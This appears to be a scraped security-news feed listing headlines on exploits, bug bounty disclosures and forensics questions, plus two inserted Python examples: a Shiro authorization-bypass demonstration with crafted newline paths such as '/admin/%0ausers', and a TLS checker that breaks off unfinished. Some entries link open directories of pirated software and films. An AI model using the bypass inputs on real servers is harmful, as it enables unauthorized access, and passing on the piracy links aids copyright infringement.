    submitted by /u/SCI_Rusher
    Harvesting Browser Passwords from Windows Credential Vault — Mimikatz
    submitted by /u/Clement_Tino
  • Open

    What are the most essential third-party risk management tools?
    Vulnerabilities in the supply chain may cause cyberattacks. It also means that the concerns or vulnerabilities in the supply chain may… Continue reading on Medium »
    Which company provides the best penetration testing services?
    At times, it may not be that easy to approach the best pen testing services. The market is full of unqualified professionals, misleading… Continue reading on Medium »
    Which company provides the best red team security consulting?
    It is not a straightforward question to answer as there are many established companies, which provide red team security assessment… Continue reading on Medium »
    HOW I HACKED A HEALTH INSTITUTION [Domain Admin Compromise]
    Hello everyone, today I will be bringing you a new war-story of mine that had just wrapped up in the recent months. At a high level, I was… Continue reading on Medium »
    Relaying NTLM Authentication from SCCM Clients
    tl;dr: Seriously, please disable NTLM Continue reading on Posts By SpecterOps Team Members »
  • Open

    Open redirect found on account.brave.com
    Brave Software disclosed a bug submitted by tabaahi: https://hackerone.com/reports/1338437 - Bounty: $300
    Arbitrary file download via "Save .torrent file" option can lead to Client RCE and XSS
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/963155 - Bounty: $200
    Arbitrary file download due to bad handling of Redirects in WebTorrent
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/975514 - Bounty: $150
    Redirecting users to malicious torrent-files/websites using WebTorrent
    Brave Software disclosed a bug submitted by d3f4u17: https://hackerone.com/reports/968328 - Bounty: $200
    Browser is not following proper flow for redirection cause open redirect
    Brave Software disclosed a bug submitted by abhinavsecondary: https://hackerone.com/reports/1579374 - Bounty: $500
  • Open

    OSINT and Public Administration (again)
    A few (brief) reflections, completely off the cuff. Continue reading on Medium »
    War in Ukraine / June 29
    The oil embargo has not yet produced visible results Continue reading on Medium »
    Dispelling Russian Lies About the Missile Strikes in Kremenchuk
    On June 27th, 2022, two Kh-22 anti-ship missiles outfitted with upwards of 1,000kg of explosives struck targets in Kremenchuk, Ukraine. Continue reading on Medium »
  • Open

    Choosing your job role in cybersecurity
    All About String in Python
  • Open

    SecWiki News 2022-06-30 Review
    No news has been posted today. For more of the latest articles, visit SecWiki.
  • Open

    Model ww2 things
    submitted by /u/PM_ME_TO_PLAY_A_GAME
  • Open

    6/30 XSS study log
    CORS Continue reading on Medium »

  • Open

    Securing mobile phones and apps, What endpoint solutions are you using?
    Hey everyone, I'm currently working as a security admin at a mid-sized company. Lately I've been looking into different mobile phone security options for our BYOD policy. As everyone knows, there have been a bunch of phishing attacks, OS exploits, and hacks on Instagram, which is primarily what our marketing team uses. My main concern is the phishing links or exploits that prevent the use of Instagram. I've already created visuals and run the company through steps to ensure their safety when using the apps (not clicking random links, sketchy links, giving out passwords, etc.) but human error exists and I don't want to be the one at fault if there's an issue. Curious to know what everyone's using at their companies; I'm looking beyond just VPN solutions as I feel we need something more secure and reliable like a full endpoint security system. So far I've been looking at Lookout, Check Point, and CrowdStrike, mainly because of their file protection systems in addition to apps, etc. Let me know! submitted by /u/psaiful28
    Creating Proxy like Burpsuite / ZAP Proxy
    Hi, is there any guide on creating tools like Burp Suite or ZAP Proxy, specifically the intercept module and the logger? I need to capture all the requests including the HTTP headers, request parameters and more. Main problem: I already have a simple GUI form (Java), literally a GUI form without any functionality, but I don't know how to get the request. If I remember correctly, during the installation of Burp Suite the user should install a .cert file; should I also generate that one for my program? Thanks! submitted by /u/pldc_bulok
  • Open

    Cryptographic failures in RF encryption allow stealing robotic devices | Cossack Labs
    submitted by /u/evilsocket
    Exploiting Intel Graphics Kernel Extensions on macOS to Escape the Safari Sandbox
    submitted by /u/gaasedelen
    CloudGoat detection_evasion Scenario: Avoiding AWS Security Detection and Response
    submitted by /u/hackers_and_builders
    CVE-2022-28219: Unauthenticated XXE to RCE and Domain Compromise in ManageEngine ADAudit Plus
    submitted by /u/scopedsecurity
    How to Steal Browser’s Autofill Credentials via Cross-Site Scripting (XSS)
    submitted by /u/obilodeau
    How to Evade Windows Defender and Commercial AV with Msfvenom Payloads
    submitted by /u/entropydaemon6
  • Open

    OAuth Misconfiguration Leads To Pre-Account Takeover
    IW Weekly #4: BITB Attack, Hackthebox Walkthrough, Twitter Link Takeover, and more.
    Text Based Injection | Content Spoofing on ISRO Website
  • Open

    【安全通报】Apache Shiro权限绕过漏洞(CVE-2022-32532)
    In Apache Shiro versions before 1.9.1, using RegExPatternMatcher with a regular expression that contains "." may lead to an authorization bypass. The vulnerability stems from the fact that, in the regex matching RegExPatternMatcher uses by default, "." does not match a newline...
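    The mechanism in the advisory above, as an added illustration in Python (this is not Shiro's Java code). A Shiro-style RegExPatternMatcher requires the pattern to match the whole request path (Java's Matcher.matches(), re.fullmatch() here), so a path carrying a decoded newline falls outside a "." pattern and drops through to the default anon filter; compiling with DOTALL (Java: Pattern.DOTALL) closes that gap. The filter chain, the paths, and the assumption that the container hands Shiro the %0a decoded are constructed for the example; whether that decoding happens depends on the servlet container, which is why the advisory says "some" containers are affected.

```python
import re
from urllib.parse import unquote

# Added illustration, not Shiro's code. The chain definition and request
# paths below are constructed for the example.


class RegexPatternMatcher:
    """Shiro-style matcher: the regex must match the WHOLE path."""

    def __init__(self, pattern, flags=0):
        self._re = re.compile(pattern, flags)

    def matches(self, path):
        # fullmatch() is the analogue of Java's Matcher.matches(): any
        # unmatched trailing character makes the whole match fail.
        return self._re.fullmatch(path) is not None


class FilterChain:
    """Ordered (matcher, filter) rules; first match wins, else the default."""

    def __init__(self, rules, default="anon"):
        self.rules = rules
        self.default = default

    def resolve(self, path):
        for matcher, filter_name in self.rules:
            if matcher.matches(path):
                return filter_name
        return self.default


# Pre-1.9.1 behaviour: default flags, so "." does not match "\n".
VULNERABLE_CHAIN = FilterChain([(RegexPatternMatcher(r"/admin/.*"), "authc")])
# Fixed behaviour: DOTALL lets "." consume newlines as well.
FIXED_CHAIN = FilterChain(
    [(RegexPatternMatcher(r"/admin/.*", re.DOTALL), "authc")]
)


def resolve_both(raw_path):
    """Decode the path the way an affected container would, then resolve it
    against both chains. Returns (decoded_path, pre_1_9_1_filter, fixed_filter)."""
    path = unquote(raw_path)
    return path, VULNERABLE_CHAIN.resolve(path), FIXED_CHAIN.resolve(path)


def has_control_chars(path):
    """Defence in depth: a legitimate request path never contains control
    characters, so reject them before any pattern is consulted."""
    return any(ord(c) < 0x20 or c == "\x7f" for c in path)


if __name__ == "__main__":
    for raw in ("/admin/users", "/admin/%0ausers", "/admin/%0a"):
        path, vuln, fixed = resolve_both(raw)
        print(f"{raw!r:20} pre-1.9.1: {vuln:5}  fixed: {fixed:5}  "
              f"control chars: {has_control_chars(path)}")
```

    Rejecting control characters in the path, as has_control_chars() does, is independent of the regex fix and protects every other pattern-based rule too, so it is worth keeping even after upgrading.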
  • Open

    SecWiki News 2022-06-29 Review
    Advanced Windows TaskScheduler Playbook by ourren; Using software visualization and transfer learning in software defect prediction by ourren; Building modular call graphs for security scanning of NodeJS applications by ourren; Satellite security: from getting started to getting in the door by ourren; On the "way" and "technique" of enterprise security building, part one: the way, by ourren. For more of the latest articles, visit SecWiki.
  • Open

    read-only ethernet cable
    Hello, I'd like to make a read-only Ethernet cable to sniff traffic and send it to Snort. I found a lot of links on the web but some lack information and others are too complex. I found this, but it seems to me that it talks about a read-only one-way cable. Obviously I need a two-way cable. Can you help me find a simple how-to? Thanks. submitted by /u/SkyTeeth
  • Open

    Big ol' pile of movies
    [ Removed by reddit in response to a copyright notice. ] submitted by /u/neofaust
    Mamont's open FTP Index / Page 22 of 49
    submitted by /u/thiskeepsmeupatnight
  • Open

    Active Directory Penetration Testing Sample Report
    There are a bunch of web app pentest reports that can be found on https://pentestreports.com/reports/. However, I did not see any sample report for Active Directory penetration testing. If you happen to know of one, please share it here. Thanks. submitted by /u/w0lfcat
  • Open

    XSS Payload on TikTok Seller Center endpoint
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1554048 - Bounty: $1000

  • Open

    FabricScape: Escaping Service Fabric and Taking Over the Cluster
    FabricScape (CVE-2022-30137) is a privilege escalation vulnerability of important severity in Microsoft's Service Fabric, commonly used with Azure. The post FabricScape: Escaping Service Fabric and Taking Over the Cluster appeared first on Unit 42.
  • Open

    Abusing Cloudflare Workers
    submitted by /u/thorn42
    Zimbra unauthenticated RCE via unrar path traversal (CVE-2022-30333)
    submitted by /u/monoimpact
    Hive Ransomware Decrypter Tool - KISA
    submitted by /u/CyberMasterV
    CVE-2022-30522 - Apache httpd "mod_sed" DoS vulnerability
    submitted by /u/SRMish3
    Intune hacking: when is a "wipe" not a wipe
    submitted by /u/nopslider
  • Open

    Forensic Tools for Browser Data
    Does anyone recommend any tool for extracting browser data? I am using the Foxton Browser Examiner trial, which is great. But are there any suggestions for other software similar to this? The data is partially damaged as it was deleted and then recovered. Any suggestions would be appreciated. The data is sitting in a folder rather than an installed OS. submitted by /u/niveapeachshine
    Paladin Not Detecting Source Drive
    Hello folks, I am using a Paladin USB (version 8.x.x) on a Dell Latitude to take an image of the hard drive. Paladin does not appear to detect the hard drive of the device, only the USB drive and my external SSD I'm using as the image destination. Secure Boot is off. I tried poking around in the BIOS and disabled the UEFI Boot Path Security, but that didn't work. Has anyone come across this issue before? The only other BIOS setting I can see is that RAID is also enabled. Any tips would be appreciated. If all else fails I will just remove the hard drive and image it with a write blocker, so all hope is not lost yet. submitted by /u/scottrich5
    BitLocker and Unallocated Space
    I'm trying to carve for files from a system that was BitLocker encrypted. However, the free space still appears to be encrypted. Is this what everyone else typically sees? I did some testing on a VM where I enabled BitLocker, took an image and decrypted it using the recovery key, and the free space appears to still be encrypted as well. submitted by /u/Mufassa810
  • Open

    ByPass — LSA Protect (RunAsPPL)
    RunAsPPL is widely known and applied during hardening, not least because of how easy the protection is to apply, but… Continue reading on 100security »
    Protocols and Servers 2 | TryHackMe (THM)
    Lab Access: https://tryhackme.com/room/protocolsandservers2 Continue reading on Medium »
    Hacker Search Engines
    A list of search engines useful during Penetration testing, vulnerability assessments, red team operations, bug bounty and more Continue reading on Medium »
    The Phantom Credentials of SCCM: Why the NAA Won’t Die
    TL;DR — Stop Using Network Access Accounts! Continue reading on Posts By SpecterOps Team Members »
  • Open

    Massive Trove of Gun Owners’ Private Information Leaked by California Attorney General
    submitted by /u/Hotdogpizzathehut
    Microsoft Sentinel Automation Tips & Tricks – Part 1: Automation rules
    submitted by /u/SCI_Rusher
  • Open

    HTML and Hyperlink Injection via Share Option In Microsoft Onenote Application
    Hyperlink injection is when an attacker injects a malicious link when sending an email invitation. Continue reading on InfoSec Write-ups »
    Livepeer (Non Smart Contract) Security Disclosure Program
    Program Overview Continue reading on Livepeer Blog »
    How I Earned $200 in 5 Minutes | Open Redirection
    Hello Researchers, Continue reading on Medium »
    OpenSSH CVE-2018–15473 User Enumeration Vulnerability
    Description: Continue reading on Medium »
    XSS cheatsheet payloads
    XSS PAYLOADS Continue reading on Medium »
    Hacker Search Engines
    A list of search engines useful during Penetration testing, vulnerability assessments, red team operations, bug bounty and more Continue reading on Medium »
    Step 11: Attacking Web Applications with Ffuf
    As of starting this one, it’s Monday 27th June and my second to last day in work. Continue reading on Medium »
    Giveaway #2: The Ultimate Guide to Hunt Account Takeover(2022)
    INTRODUCTION Continue reading on Medium »
    Access control worth $2000 (everyone missed this IDOR+Access control between two admins.)
    Tribute to Binit Ghimire Continue reading on Pentester Nepal »
    BugBounty Writeup: XSS, JWT none attack, Improper Error Handling
    Hackers around the world hunt bugs and, in some cases, earn full-time incomes. Continue reading on Medium »
  • Open

    STUFF
    AMC CC 2021 v17, AMC CC 2022 v26, AMC CC 2022 v31, AutoD 3ds, SketchU 2017: http://in2017.iptime.org/Util/Graphic/ submitted by /u/rwolfman3000
    I found a good OD... Here you will find AutoDesk, graphics, network And programming Courses. Oh, And Fifa 22!
    http://dl.jb-team.com/ submitted by /u/yahya007
  • Open

    Nmap timing, tips and tricks?
    I can't be the only one, and I have messed around with settings, but I'm hoping someone can chime in with a better or best way to do this. So, scanning an internal class C, I get a ton of this; I don't want to wait 15 hours for a class C to port map, but I don't want to sacrifice accuracy either. This is just using nmap -vv -sC -sV 192.x.x.x/24 -Pn:
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    adjust_timeouts2: packet supposedly had rtt of 9384712 microseconds. Ignoring time.
    Thanks in advance. submitted by /u/networkalchemy
    AlienVault OSSIM and ansible automation
    I have an AlienVault OSSIM environment where I routinely create/rebuild monitored VMs using Ansible. The usual steps to add a system to AlienVault are:
    1. Install the agent on the target
    2. Log into the AV server via SSH
    3. Enter "Jailbreak"
    4. Register the target IP using manage-agent
    5. Extract the generated key and copy it to the target
    6. Configure the key on the target agent
    I want to automate these steps using Ansible as it's a pain to do all the above manually. Is anyone aware of any existing work in this area? submitted by /u/geggleau
    I need advice from people who have gone through a similar situation
    Hey everyone, I'm a beginner in pentesting and I decided to learn it after 3 years of university as a specialist in network security. But honestly, after 3 years I didn't learn anything about pentesting (only math, Cisco and humanities subjects). Now it seems to me like I lost my time, and whenever I can't solve tasks in pentesting I feel very, very bad because I have to know all of this. I blame myself for how stupid I am because everyone in my surroundings is good at pentesting and they're winning in CTFs. I really love pentesting but I don't feel confident; it seems to me that neither society nor my future employer needs me, because in a year I'm already graduating from the university and I don't know anything. Thank you for listening; if you have overcome a similar situation please share ^^ UPD: thanks to those who replied, it means a lot to a teenager who often forgets to just keep going. Thank you for your support *hugs to everyone* submitted by /u/_hanabi_n
  • Open

    HACK THE BOX: Easy Phish
    Challenge lab: Osint Continue reading on Medium »
    War in Ukraine / June 27
    One of the bloodiest wars of the XXI century Continue reading on Medium »
    Week 7: Exciting
    Hello Everyone, Continue reading on Medium »
  • Open

    SecWiki News 2022-06-28 Review
    How detection engines' sensitivity to entropy affects packer design, by Avenger. For more of the latest articles, visit SecWiki.
  • Open

    Ten days until the live stream! Full agenda of the CIS Conference Summer Edition announced
    "Security grows, restart the summer": the CIS Conference Summer Edition · Summer Live is about to arrive!
    FreeBuf Morning Report | Killnet attacks Lithuanian government websites; cyberattack forces Iranian steel company to halt production
    Killnet attacked Lithuanian government websites.
    Iran's largest steel producer hit by a cyberattack
    Ebrahimi said the company's website would be restored and back online soon. As for why the company halted operations: when the cyberattack happened, the plant had just lost power and could not continue production.
    "Provisions on the Administration of Internet User Account Information" published, effective August 1
    On June 27, the Cyberspace Administration of China published the "Provisions on the Administration of Internet User Account Information", effective from August 1, 2022.
    Impersonating BBVA bank's 2FA app: the deep disguise of the Android malware "Revive"
    A new Android banking malware named "Revive" has been discovered.
  • Open

    Make a Self-Replicating Virus in Python
    Learning More about File Upload Vulnerabilities
    The vulnerability associated with file uploads is well-known and considered to be of high severity. This vulnerability exists because the… Continue reading on InfoSec Write-ups »

  • Open

    Microsoft Hall Of Fame for a Small Misconfiguration.
    Hey everyone! I’m Aman, in this write-up I am going to show how you can find rate limit bug and my journey to the Microsoft Hall of Fame Continue reading on Medium »
    The Modern-Day Android Application Pentesting Approach for BugBounties/Assessments
    Understand the Attacker’s Approach and Mindset behind Pentesting Modern-Day Android Applications :D Continue reading on Medium »
    ITS TIME TO TAKEOVER ACCOUNT
    HOW I WAS ABLE TO TAKE OVER ANY USER ACCOUNT USING THE INVITE FUNCTION Continue reading on Medium »
    MUST HAVE : Skill for Cyber Security Engineer
    Are you someone with a passion for cyber security engineering? Let's talk business; I will share the must-have skills you need to… Continue reading on Medium »
    MUST KNOW : Popular operating systems in Cyber Security
    Every aspect of our life has been fulfilled by digital devices, as we can buy everything, reserve a table for two, or pay the bills in… Continue reading on Medium »
    My Pentest Log -22 — (Account Takeover Via Sinf file)
    Greetings to all from Porta Petrion, Continue reading on Medium »
    PocketPay Mobile Application Bug Bounty Campaign
    PocketPay apps are being launched on Android and iOS app stores. It’s time for the community to evolve and make things right; yes, it’s a… Continue reading on PocketPay »
    HackerOne — Getting Started
    So HackerOne was one of my favorite places to practice. I stopped completing the challenges so the invites could be used at a later time… Continue reading on Medium »
    Cyber Security is an activity carried out with the aim of securing and preventing…
    With the many cyber crime incidents around the world, we would do well to produce and gather people who are skilled in… Continue reading on Medium »
    INERY BLOCKCHAIN INCENTIVIZED TESTNET WHITELIST
    Inery is the first-ever decentralized database management and blockchain solution $INR Continue reading on Medium »
    Intigriti’s June XSS challenge — Reflected XSS Write-up
    Preface Continue reading on Medium »
  • Open

    Velociraptor
    Hello. I am trying to test out Velociraptor but I'm having issues creating a "client.config.yaml" file to be used for my Windows agent installation. Has anyone been able to successfully deploy the agent in their environment on Windows, Linux and macOS? Also, what are you using for the "server", a physical box or a VM? submitted by /u/antmar9041
    Open source tools and DFIR Tryhackme equivalents
    I love learning about pentesting and DFIR, but something I've noticed is that hacking has way more open source options and better learning material. Pentesting has so many amazing cheap hands-on learning resources; DFIR, on the other hand, has none that I know of. In DFIR it seems like the only way forward is to learn SANS ($$$). Don't get me wrong, I know things like The Sleuth Kit exist. I just don't know where to get hands-on experience with it in a learning environment. submitted by /u/MLGShyGuy
    Browser Add-on to screenshot a whole page.
    I watched this video: https://youtu.be/gue5MofILxY?t=2354 and Cody Kinsey mentions a browser add-on that can continually scroll to the bottom of someone's social media feed or website and screenshot all the way down. Later this tool stitches these together as a PDF to keep a record of their page. Is anyone familiar with a tool or browser add-on capable of this? The tools I've found are either not free or don't work. submitted by /u/MLGShyGuy
  • Open

    CVE-2022-32208: FTP-KRB bad message verification
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614332 - Bounty: $480
    CVE-2022-32206: HTTP compression denial of service
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614330 - Bounty: $2400
    CVE-2022-32205: Set-Cookie denial of service
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614328 - Bounty: $480
    CVE-2022-32207: Unpreserved file permissions
    Internet Bug Bounty disclosed a bug submitted by nyymi: https://hackerone.com/reports/1614331 - Bounty: $2400
    Unauthorized Access to Internal Server Panel without Authentication
    U.S. Dept Of Defense disclosed a bug submitted by ahmd_halabi: https://hackerone.com/reports/1548067
    Reflected XSS via `` parameter
    U.S. Dept Of Defense disclosed a bug submitted by mdakh404: https://hackerone.com/reports/1536215
    HTTP request smuggling with Origin Rules using newlines in the host_header action parameter
    Cloudflare Public Bug Bounty disclosed a bug submitted by albertspedersen: https://hackerone.com/reports/1575912 - Bounty: $3100
    Bypassing Cache Deception Armor using .avif extension file
    Cloudflare Public Bug Bounty disclosed a bug submitted by bombon: https://hackerone.com/reports/1391635 - Bounty: $500
    Sign in with Apple generates long-life JWTs, seemingly irrevocable, that grant immediate access to accounts
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1593413 - Bounty: $250
    Sign in with Apple works on existing accounts, bypasses 2FA
    Cloudflare Public Bug Bounty disclosed a bug submitted by mattipv4: https://hackerone.com/reports/1593404 - Bounty: $1000
    API docs expose an active token for the sample domain theburritobot.com
    Cloudflare Public Bug Bounty disclosed a bug submitted by sainaen: https://hackerone.com/reports/1507412 - Bounty: $500
    Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
    Internet Bug Bounty disclosed a bug submitted by windshock: https://hackerone.com/reports/1599573 - Bounty: $2400
    CVE-2022-32205: Set-Cookie denial of service
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1569946
    CVE-2022-32206: HTTP compression denial of service
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1570651
    CVE-2022-32207: Unpreserved file permissions
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1573634
    CVE-2022-32208: FTP-KRB bad message verification
    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1590071
    Credential leak when use two url
    curl disclosed a bug submitted by chen172: https://hackerone.com/reports/1569926
  • Open

    How does a threat Intel company business model work?
    I was wondering how do companies that specialize in providing threat Intel generate revenue? Do they provide Intel feeds on a subscription based model to customer companies, or are they usually selling B2B to vendors such as fire wall companies? Thank you submitted by /u/DoubleAgent10 [link] [comments]
    Sending an email
    I have a question about SMTP servers. I learned that when sending mail, the sender's SMTP server forwards the mail to the recipient's SMTP server. When I heard that the SMTP server on the recipient's side forwards the mail to the POP/IMAP server for the recipient to receive, I thought why not just receive the mail directly from the SMTP server? submitted by /u/Awkward_String139 [link] [comments]
    Awesome Hacker Search Engines
Hi everybody. Just published a repo containing search engines and online services useful for pentesting, general security, red team, bug bounty etc. This is the link: https://github.com/edoardottt/awesome-hacker-search-engines submitted by /u/edoardottt [link] [comments]
    Is ELK as an integrated security solution any good?
    I am pretty impressed by the amount of integrations one can enable on an ELK stack. Basically, it can provide SIEM capabilities, EDR functions through osquery modules, dashboarding for every situation, network topology mapping and so much more. Moreover, it does cut the total spending quite a lot, especially when compared to other specialized solutions like Splunk and similar. I have 3 main questions: Is anyone successfully using it? Pros/cons to ad hoc solutions? How much maintenance/development does it require to keep running all the pieces together? Thank you in advance. submitted by /u/gatheringchaos [link] [comments]
  • Open

    IW Weekly #3: SQL Injection, Data Exfiltration, Log Poisoning, Blind XSS, and more.
    No content preview
    Analyzing CVE-2022–22980 to discover a real exploitable path in the source code review process with…
    No content preview
How I was able to takeover 3 Subdomains of an Organization via Shopify?
    No content preview
    Getting Your First Bug (Part II)
    No content preview
  • Open

    War in Ukraine / June 24–26
    Russia is actively shelling Ukraine Continue reading on Medium »
    OSINT CTFs
    OSINT CTFs (Capture The Flag games) let you hone your skills through problem-solving games. I especially like those that educate you… Continue reading on Medium »
    Profil3r Tool — OSINT Tool
    Profil3r Tool Continue reading on Medium »
    How do I destroy malware and identify the author — Malware Analysis
    Hello Hackers, I’m MrEmpy and welcome. Today I will tell a story of how I found the author of malware. Continue reading on Medium »
  • Open

    SecWiki News 2022-06-27 Review
Thoughts on Building an Attack-and-Defense Detection System for Commercial Banks by ourren; SecWiki Weekly (Issue 434) by ourren; Introduction to Information-System Supply-Chain Security Management by ourren; OpenATS, an Open-Source Satellite Ground Station by ourren. For more recent articles, visit SecWiki.
  • Open

    Offensive Security: Getting Your Foothold In The Industry
    It’s been about a month since I published my last article discussing my OSCP journey and how I passed it. I am truly grateful for the… Continue reading on Medium »
    Kerberoasting Attacks and Detections
    Basic Overview Continue reading on Medium »
    A Plan for OSCP
    Hey, everyone welcome to my OSCP journey. Continue reading on Medium »
    HackerOne — Getting Started
    So HackerOne was one of my favorite places to practice. I stopped completing the challenges so the invites could be used at a later time… Continue reading on Medium »
  • Open

    PortSwigginar - 22 June
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included: A recap on "what's new" within the product for those who h
  • Open

    Revive: from spyware to Android banking trojan | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    VaultBoot: remote attestation
    submitted by /u/hardenedvault [link] [comments]
    Notes on OpenSSL remote memory corruption
    submitted by /u/Gallus [link] [comments]
  • Open

FreeBuf Morning Report | Tencent QQ responds to mass account hijacking; hackers are still exploiting the Log4Shell vulnerability
Tencent QQ officially responded that the main cause was users scanning forged game-login QR codes created by criminals and authorizing the login; the sessions were hijacked and recorded by black-market groups, who then used the accounts to send obscene image adverts.
"Security Certification Specification for Cross-Border Processing of Personal Information" released, regulating cross-border personal-information activities
The certification specification sets out requirements covering basic principles, the obligations of personal-information processors and overseas recipients in cross-border processing, and safeguards for the rights of data subjects.
"Anti-Telecom and Online Fraud Law of the People's Republic of China (draft, second reading)" released
The Anti-Telecom and Online Fraud Law has seven chapters and 46 articles and is intended to further prevent, curb and punish telecom and online fraud and to strengthen anti-fraud work.
Russia fines Google for spreading "unreliable" information discrediting its army
Russia's telecom regulator Roskomnadzor has fined Google 68 million roubles (about US$1.2 million).
Mass QQ account theft, with obscene images sent to friends; Tencent responds
After a QQ account is stolen, it automatically joins assorted spam groups and sends spam, pornographic and gambling messages and links to friends and groups.
Texas natural-gas plant explosion: a Russian threat actor may be behind it
Recently a liquefied natural gas plant in Texas exploded; the investigation suggests the incident may have been caused by a cyberattack, with a Russian threat actor possibly behind it. The explosion occurred at the Freeport LNG liquefaction plant on Quintana Island, Texas, and will have a lasting impact on Freeport LNG's operations. The preliminary investigation indicates the incident was caused by over-pressurisation and rupture of a section of LNG transfer piping, leading to rapid flashing of the LNG and the release and ignition of a natural-gas vapour cloud. It is still unclear why the facility's safety mechanisms did not prevent the
  • Open

    Pretty good archive of TV, with differing quality types, it's seems to have some dubbed
    submitted by /u/hannibalateam [link] [comments]
    Huge directory of music videos
    submitted by /u/ilikemacsalot [link] [comments]

  • Open

    linx - Reveals invisible links within JavaScript files
    submitted by /u/rjz4 [link] [comments]
  • Open

    Detecting Linux Anti-Forensics Log Tampering
    submitted by /u/lugh [link] [comments]
    What is the modern, unofficial digital forensics process model that sees the most real-world application to investigations?
    To my understanding and research thus far which may be incorrect, I have gathered that there is still no official model to follow for digital forensic investigations. However, there are a number of proposed models such as: First proposed methodology from Politt outlines: Acquisition>Identification>Evaluation>Admission. DFRWS investigative model outlines: Identification>Preservation>Collection>Examination>Analysis>Presentation. Abstract digital forensics model (ADFM) outlines: Identification>Preparation>Approach Strategy>Preservation>Collection>Examination>Analysis>Presentation>Returning Evidence. Integrated digital investigation process (IDIP) outlines: Readiness Phase>Deployment Phase>Physical Crime Scene Investigation Phases/Digital Crime Scene Investigation Phases>Review Phase. Etc... That said, is there a proposed model that is used more commonly in modern investigations than others to the point in which it can almost be considered the unofficial standard? Or is it truly "pick what's most applicable to this specific investigation"? Thank you. submitted by /u/ringzero_ [link] [comments]
  • Open

    Intigriti’s May XSS challenge By PiyushThePal
    How far can you take prototype pollution? This challenge is a great showcase which uses an unpatched jQuery plugin to exploit and bypass… Continue reading on Medium »
  • Open

    Bypassing Cloudflare WAF with Host header manipulation
    Hey Folks! Thanks for your responses on my last blog. Let’s learn something new today as it is going to be damn interesting one. Continue reading on Medium »
The OS, or Operating System, is a very important element of the device we hold in our hands today…
Linux: as a Cyber Security Engineer we must know well what Linux is and how to use it. Basically… Continue reading on Medium »
MSA Weekly 1 — "5 Operating Systems for Cyber Security"
Ethical hacking is the activity of identifying weaknesses in computer systems or computer networks, and it can… Continue reading on Medium »
MSA Weekly 1 — "Skills a cyber security engineer must have"
So, we have learned about the operating systems commonly used in cyber security; now let's learn some of the skills that must… Continue reading on Medium »
MSA Weekly 1 — "5 Cyber Security OSes you need to know!"
In today's digital era, we are certainly familiar with the term cyber security. Quoting Cisco, cyber security… Continue reading on Medium »
    How to find bugs : ULTIMATE TIPS
    There is consistently one more bug to fix. On the off chance that we don’t fix 100% of the bugs in our site, the site will be totally… Continue reading on Medium »
    How to find 1st bug for beginner bounty hunters (from personal experience)
    For people starting the bug bounty journey… Continue reading on Medium »
MSA Weekly 1 - "Skills a Cyber Security Engineer must have"
Entering the information era, in which communication and commerce over the internet have become the main focus for businesses, consumers, governments and… Continue reading on Medium »
    MAGNETY TESTNET QUICK GUIDE
    Magnety is The first DeFi Social Wallet Continue reading on Medium »
    My Reason for Writing on Medium as a Bug Bounty Hunter
    I’m a hacker who likes to write. Continue reading on Medium »
  • Open

    User can link non-public file attachments, leading to file disclose on edit by higher-privileged user
    Phabricator disclosed a bug submitted by foobar7: https://hackerone.com/reports/763177 - Bounty: $500
  • Open

    How did I design and build a complex AD set
    Hi Folks, today I would like to share how did I design and build a vulnerable AD set. Before moving to this topic, let me introduce the… Continue reading on Medium »
    Red Team vs Blue Team
    As I study for my Security+ exam, I covered the topic of the Read Team and Blue Team. In the world of cybersecurity, these groups work… Continue reading on Medium »
    Walkthrough of My Vulnerable AD Set
    Hi guys, in previous days I designed and built a difficult and complex vulnerable AD set, I planned to post the guide to reproduce it… Continue reading on Medium »
  • Open

    Decrypting TLS In Wireshark For Homegrown Application
Hello Everyone! I posted about this in /r/networking yesterday (link below for background), made some progress there, but hoping I can get a little further here. We have an in-house application we've written for our client for network communication over the internet between us and them. Almost everything is working well except for some errors inside the TLS stream they've asked me to debug. My company created the certificates in Windows Server 2019 by installing the "Certificate Authority" role. I have the password used to create the cert. So in theory I should have access to everything I need to decrypt the TLS sections of the packet capture, but this is the first time I've done this and I'm not having any luck. I have the .pfx files and I used openssl.exe to export the private key and openssl didn't report any errors in that process. I tried that private key in Wireshark but it didn't decrypt the TLS stream. So I tried converting that to a plain-text unencrypted private key file with openssl.exe and loading that into Wireshark; still didn't decrypt the TLS stream. I've tried every combination I can think of in Wireshark. In Protocols>TLS I've tried the options "RSA Keys List", "TLS Debug File", "Pre-Shared Key", and "(Pre)-Master-Secret log filename". There is also a general "RSA Keys" section in the main Preferences window and I loaded the keys there as well, no luck. The "Application Data" packets still show up with the encrypted data. I also made sure the private key file name matched the "commonName" field of the certificate exchange packet in the capture. I'm unsure how to proceed from here. What am I missing? What else can I try? https://old.reddit.com/r/networking/comments/vkrz4g/decrypting_tls_in_wireshark_for_homegrown/? submitted by /u/LearningSysAdmin987 [link] [comments]
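The check a practitioner would run first on a capture like the one above, as an added example that is not part of the original post or of Wireshark: Wireshark's "RSA Keys" list can only decrypt sessions whose negotiated cipher suite uses static RSA key exchange, where the client encrypts the premaster secret to the server certificate's public key. With any ECDHE/DHE suite, and with every TLS 1.3 suite, the server's RSA key only signs the handshake and never decrypts anything, so loading it changes nothing; the session secrets then have to come from a key log file (the "(Pre)-Master-Secret log filename" preference). The script parses a ServerHello record and says which case applies. The records it parses are constructed fixtures built by build_server_hello(), not captured traffic; the cipher-suite numbers are IANA registry values.

```python
"""Does this TLS session decrypt with the server's RSA private key alone?

Added example, not code from the original post or from Wireshark. The records
parsed below are constructed fixtures built by build_server_hello(), not
captured traffic.
"""
import struct
from typing import Dict, Tuple

# Static-RSA suites (IANA registry values): the client encrypts the premaster
# secret to the server certificate's public key, so that private key recovers it.
RSA_KX_SUITES = {
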